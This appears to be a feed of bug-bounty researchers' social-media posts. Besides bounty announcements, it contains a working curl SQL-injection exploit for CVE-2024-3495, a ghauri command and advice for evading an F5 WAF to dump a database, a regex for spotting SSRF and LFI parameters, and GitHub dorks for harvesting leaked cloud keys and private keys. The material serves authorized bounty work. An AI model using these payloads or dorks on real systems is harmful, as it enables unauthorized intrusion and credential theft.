Tahmid Niloy

Alhamdulillah Thankful to Almighty Allah for this success. Awarded a €5,000 bounty #bugbountytips #infosec

@Be5Lmt @hunter_0x21 @or4nge16hehe I have almost similar issues 🙃

SQL Injection without these special chars [' "()\/%*&\`] possible? Yep, me and @or4nge16hehe did it. Using only: [ a-z, 0-9, dot, @+- ] Write-up soon #BugBounty #infosec

@RyanKloncz @nav1n0x @lostsec_ Thank you brother

I’ve identified a confirmed SQLi on a target, but I’m currently stuck due to F5 WAF blocking data extraction. Tested with Ghauri, and injection works, but dumping the DB isn’t possible so far. @nav1n0x @lostsec_ Any guidance or suggestions on handling this kind of WAF situation

@subhash_0x @nav1n0x @lostsec_ How can i get residential proxies?

@TahmidNil @nav1n0x @lostsec_ Try Rotating residential proxies

@lostsec_ @MichaelCarthy @nav1n0x Tried —confirm and proxychains also same behavior

@TahmidNil @MichaelCarthy @nav1n0x use --confirm it will be bypassed easily.. i tried it last time also if not worked use proxychains with residential ips

@MichaelCarthy @nav1n0x @lostsec_ Already tried didn’t find origin IP

@TahmidNil @nav1n0x @lostsec_ Shodan to find and connect via direct IP and bypass the WAF.

@mugh33ra @nav1n0x @lostsec_ I already tried but the same issues were blocked by waf

@TahmidNil @nav1n0x @lostsec_ Bro do manual exploitation just extract the following: (enough for report) - Database Name - Database User - Database Version 👌

@nav1n0x @lostsec_ Command I used: ghauri -r sqli.txt -p domain --confirm --technique=BT --dbs --batch --time-sec=2

@hunt_n27493 @torik_1999 Password reset function

@TahmidNil @torik_1999 @TahmidNil from xss bro or 0 click pass reset ?

Alhamdulillah Thankful to Almighty Allah for this success. Awarded a €5,000 bounty #bugbountytips #infosec

@hunt_n27493 @krishnsec @tabaahi_ @shreyas_chavhan @shubhamtiwari_r @RootxRavi @techycodec08 @remonsec @0xblackbird @TeslaTheGod @haxor31337 Congratulations to you 🎉

@TahmidNil @krishnsec @tabaahi_ @shreyas_chavhan @shubhamtiwari_r @RootxRavi @techycodec08 @remonsec @0xblackbird @TeslaTheGod @haxor31337 Congrats bro same pinch haha yoyo 😉

Yay! i got my first 4 digit bounty 🤑 gonna break this record very soon thanks @krishnsec @tabaahi_ @shreyas_chavhan @shubhamtiwari_r @RootxRavi @techycodec08 @remonsec @0xblackbird @TeslaTheGod @haxor31337

@torik_1999 Account takeover

@TahmidNil Bug name?

Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect: Burp Search > Regex \?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w]) And find potentially vulnerable SSRF params - github.com/In3tinct/See-S… #SSRF #cybersec

From Default IIS Page to Critical SQL Injection mugh33ra.medium.com/from-default-i…

Post 5/30 : CVE-2024-3495 - SQLi 1. Find wp-admin.ajax 2. Find out nonce : curl "Target-url" | grep nonce 3. exploit and get version curl -sk 'https:///wp-admin/admin-ajax.php' \ -d "action=tc_csca_get_states" \ -d "nonce_ajax=VALID-NONCE" \ -d "cnt=1 OR 0 UNION SELECT CONCAT(0x76657273696F6E3A,version(),0x7C757365723A,user()),2,3--+" More info: linkedin.com/feed/update/ur…

@GodfatherOrwa @Bugcrowd Happy birthday

Just submitted my birthday P1 😍 on @Bugcrowd for admin full access via GitHub leak #bugbounty

@MrKaLi176442 One of my favourite bug bounty programs

Just rewarded €€€€ SSRF lead to deactivated any user accounts #bugbountytips

🔍 GitHub Recon: Complete Guide Here’s a list of dorks you can use: Category 1: Credential & Secret Leakage org:"target" "aws_access_key_id" org:"target" "aws_secret_access_key" org:"target" "Authorization: Bearer" org:"target" "slack_token" path:*.json org:"target" "firebaseio.com" -fork org:"target" "access_token" path:*.json org:"target" "client_secret" path:*.yaml org:"target" "DATABASE_URL" path:*.env org:"target" "jwt_token" path:*.json org:"target" "sendgrid_api_key" These reveal hardcoded cloud keys, Slack tokens, and full environment creds — used in lateral cloud movement. Category 2: Internal Config & CI/CD org:"target" path:**/.env org:"target" path:**/config.js org:"target" path:**/docker-compose.yml org:"target" path:**/config.yaml org:"target" path:**/sshd_config org:"target" path:**/.github/workflows org:"target" path:**/host.json language:json org:"target" "DATABASE_PASSWORD" path:*.properties org:"target" "service_account" path:*.json Great for exposing build secrets, webhook endpoints, ssh configs, or automation credentials. Category 3: Dev/Test & Staging Discovery org:"target" "test_api_key" org:"target" "staging." org:"target" "debug=true" org:"target" "localhost:3000" org:"target" "internal_use_only" org:"target" "test_credentials" org:"target" "example_token" path:*.env These help trace dev > staging > prod transition logic, and may show accessible endpoints. Category 4: Cloud Pivot Points org:"target" "s3.amazonaws.com" org:"target" "gcloud auth activate-service-account" org:"target" "jdbc:mysql://" org:"target" "private_key" path:*.txt org:"target" path:**/id_rsa org:"target" "rds.amazonaws.com" These enable full-blown recon into S3, RDS, or Google Cloud services. 🧠 Smart Usage Tips 1. Use "pushed:>2024-01-01" for fresh commits 2. Combine with -fork to reduce noise 3. Use language: and path: to filter results 4. Automate with GitHub’s API for hourly scans 5. Integrate with subdomain recon for asset correlation (If you learned something, repost it and help others) --- What We do : linktr.ee/tcb_trainings

@0x0SojalSec Internet archiver also do the same thing -_-

Your conversations with ChatGPT are now public.😑 For a few days now, ChatGPT conversations are indexed by Google. If you share a chat with a friend, anyone can view it. dork in Google: "site:chatgpt.com/share" + your topic #cybersecurite #Aisec